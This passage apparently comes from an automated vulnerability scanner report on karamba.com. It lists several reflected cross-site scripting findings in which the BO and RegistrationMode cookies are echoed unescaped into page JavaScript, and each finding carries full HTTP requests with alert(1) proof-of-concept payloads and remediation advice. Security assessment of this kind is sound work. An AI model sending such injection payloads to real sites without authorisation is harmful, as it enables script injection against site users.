Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMa8630"-alert(1)-"42d13196f0f; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa8630"-alert(1)-"42d13196f0f; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa8630"-alert(1)-"42d13196f0f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.269. http://www.karamba.com/Home.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Home.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af96d"-alert(1)-"fc26d1b89e1 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMaf96d"-alert(1)-"fc26d1b89e1; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: BO=FMaf96d"-alert(1)-"fc26d1b89e1; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMaf96d"-alert(1)-"fc26d1b89e1";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.270. http://www.karamba.com/Home.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Home.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78021"-alert(1)-"d15b70c550f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM78021"-alert(1)-"d15b70c550f; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM78021"-alert(1)-"d15b70c550f; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM78021"-alert(1)-"d15b70c550f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.271. http://www.karamba.com/InviteFriend.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c76c1"-alert(1)-"a0f60060d98 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMc76c1"-alert(1)-"a0f60060d98; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: BO=FMc76c1"-alert(1)-"a0f60060d98; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc76c1"-alert(1)-"a0f60060d98";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.272. http://www.karamba.com/InviteFriend.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3610"-alert(1)-"d93ef14478c was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMf3610"-alert(1)-"d93ef14478c; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMf3610"-alert(1)-"d93ef14478c; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMf3610"-alert(1)-"d93ef14478c";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.273. http://www.karamba.com/PlayersClub.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23b45"-alert(1)-"58757223142 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM23b45"-alert(1)-"58757223142; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: BO=FM23b45"-alert(1)-"58757223142; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54166


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM23b45"-alert(1)-"58757223142";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.274. http://www.karamba.com/PlayersClub.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90883"-alert(1)-"cda8db6b7b4 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM90883"-alert(1)-"cda8db6b7b4; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM90883"-alert(1)-"cda8db6b7b4; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54166


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM90883"-alert(1)-"cda8db6b7b4";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.275. http://www.karamba.com/Privacy.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Privacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a755d"-alert(1)-"208f7a4e8b9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMa755d"-alert(1)-"208f7a4e8b9; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: BO=FMa755d"-alert(1)-"208f7a4e8b9; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa755d"-alert(1)-"208f7a4e8b9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.276. http://www.karamba.com/Privacy.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Privacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df76"-alert(1)-"ee1448662fa was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Privacy.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM2df76"-alert(1)-"ee1448662fa; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2df76"-alert(1)-"ee1448662fa; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2df76"-alert(1)-"ee1448662fa";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.277. http://www.karamba.com/Promotions.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f5d3"-alert(1)-"9da94da91d8 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM8f5d3"-alert(1)-"9da94da91d8; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: BO=FM8f5d3"-alert(1)-"9da94da91d8; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48434


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM8f5d3"-alert(1)-"9da94da91d8";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.278. http://www.karamba.com/Promotions.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Promotions.aspx

Issue detail

